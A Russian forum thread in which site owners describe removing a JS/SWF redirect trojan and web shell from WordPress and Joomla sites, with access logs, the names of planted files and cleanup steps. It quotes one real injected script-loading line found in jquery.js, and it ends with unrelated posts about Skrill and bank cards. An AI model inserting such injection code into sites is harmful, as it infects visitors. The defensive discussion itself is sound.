Не могу сказать что получилось на 100% побороть этот вирус (js swf), но прибить его активность и вытащить сайты из кандалов гугла удалось. Я забыл как он называется, но можно выкачать зараженный swf файл и просканировать его Касперским - он скажет его название (Trojan/Redirect как-то так).
Что нужно сделать:
1) Открываем логи сервера (Access Log) и ищем строки:
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 2 "-" "Mozilla/5.0
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 44 "-" "Mozilla/5.0
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET / HTTP/1.0" 200 41266 "-" "Mozilla/5.0
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js HTTP/1.0" 200 32221 "-" "Mozilla/5.0
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/crystal/jomama.swf HTTP/1.0" 200 39 "-" "Mozilla/5.0
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 281 "-" "Mozilla/5.0
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/smilies/galata.js HTTP/1.0" 200 39 "-" "Mozilla/5.0
178.33.69.67 - - [16/Dec/2013:08:03:29 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 45 "-" "Mozilla/5.0
Внимание! Название файлов и директорий у каждого будет разная, в моем случае было так. Найти нужные логи можно с помощью Notepad++, искать можно по слову swf (я так делал).
2) Удаляем вредоносные файлы. Обязательно найти и удалить php, js, swf файлы, у меня это были:
set-post-thumbnail.dev.php
jomama.swf
galata.js
И удалить кусок вредоносного кода из одного из js файлов сайта, в моем случае это был файл highslide-with-html.packed.js и в нем был такой код:
3) Ставим права на папки 555
4) После проделанных процедур просматриваем логи (1-2 раза в сутки). Ищем по ключу swf, и будем видеть создаются ли опять вредоносные файлы.
Могу сказать что десктопные антивирусы детектят только файл swf как вирус и то не все. ESS у меня молчал, скачал Kaspersky - он ругнулся. Еще хочу обозначить внимание на php файле, его обязательно нужно найти и удалить. Возможно все это полумера, но мне помогло. Дальше будем видеть.
Еще ищи php файл. Если посмотреть в логах он вызывается методом POST по времени совпадает с остальными (js swf). У меня компания из 3 файлов (php swf js) + один из js файлов имеет вредоносную строчку.
Да... и еще. Если раньше php файл имел код такого вида:
То теперь он такой (я его укоротил, он очень огромный, там идет что-то зашифровано). Тут какой-то пароль... чем его декодировать?
Удалил сегодня файл .php, .swf, .js и убил код который дописался в один из js файлов сайта, не помогло. Опять всей братией появились. Новые файлы с новыми названиями. Пока что заметил, что появляется 3 файла (php swf js) и кусок кода в одном из js скриптов, ничего другого больше найти не смог. Где этот вирус\шелл ума не приложу. Склоняюсь больше к тому что это дырка не в движке сайта или плагинах, это где-то на сервере.
ProLiant, попробуй поискать в логах .swf
SergPolyak, посмотрите содержимое файла /modules/comment/comment-wrapper.tpl1.php
Я подозреваю что оригинальный файл должен быть такой:
/modules/comment/comment-wrapper.tpl.php
Т.е. без цифры 1. Хотя могу ошибаться, с друпалом не работал.
Такая же участь настигла мои сайты (2 WP, 1 Joomla), все на одном VPS. Вчера обновил движки сайтов до последних версий. Создается 2 файла, всегда с разными именами: к примеру blac.js и melbourne.swf и кусок кода прописывается в какой-нибудь из .js файлов к примеру в jquery.js нашел:
;document.write("<scr"+"ipt src='/administrator/help/en-GB/blac.js'><"+"/script>");
Файлы создаются в разных местах с разными именами. На Джумле поставил права на папки 555. Со вчерашнего дня смотрю логи сервера: для джумлы пока вирусных файлов не появлялось, а для WP уже по 2 -3 раза появлялись с разными именами. Расскажите как искать шелл, смотрю тут у некоторых файлы php появлялись еще, в которых вероятно и есть шелл, у себя пока найти не смог их. Писать хостеру? Сейчас запустил сканирование каспером, ESS на ПК ничего не нашел. В ФТП пароли сменил и убрал их из файлзиллы. Куда копать? Менять права на файлы WP на 444? Буду благодарен любой помощи.
Только что заметил:
Есть файл в WP. Этот файл должен быть в WP?
/wp-admin/js/set-post-thumbnail.dev.php
Вот еще логи сервера для сайта на WP:
XX.X.199.200 - IP моего сервера
Далее проверил логи сервера для сайта на Джумле:
Нашел файл: /administrator/images/bookmarks.php
Вот содержимое подозрительных файлов:
Как видно, код практически совпадает... Подскажите пожалуйста, это шелл?
Странно, мне казалось что Skrill достойная организация.
Moneybookers, Payza может подойдет
Тоже спрашивал про счет 2625, сказали что счет не заблокирован, только карта.
У меня заблокировали вчера или сегодня, точно не могу сказать. В субботу еще снимал в банкомате, в воскресение думаю еще активна была т.к. выходной.
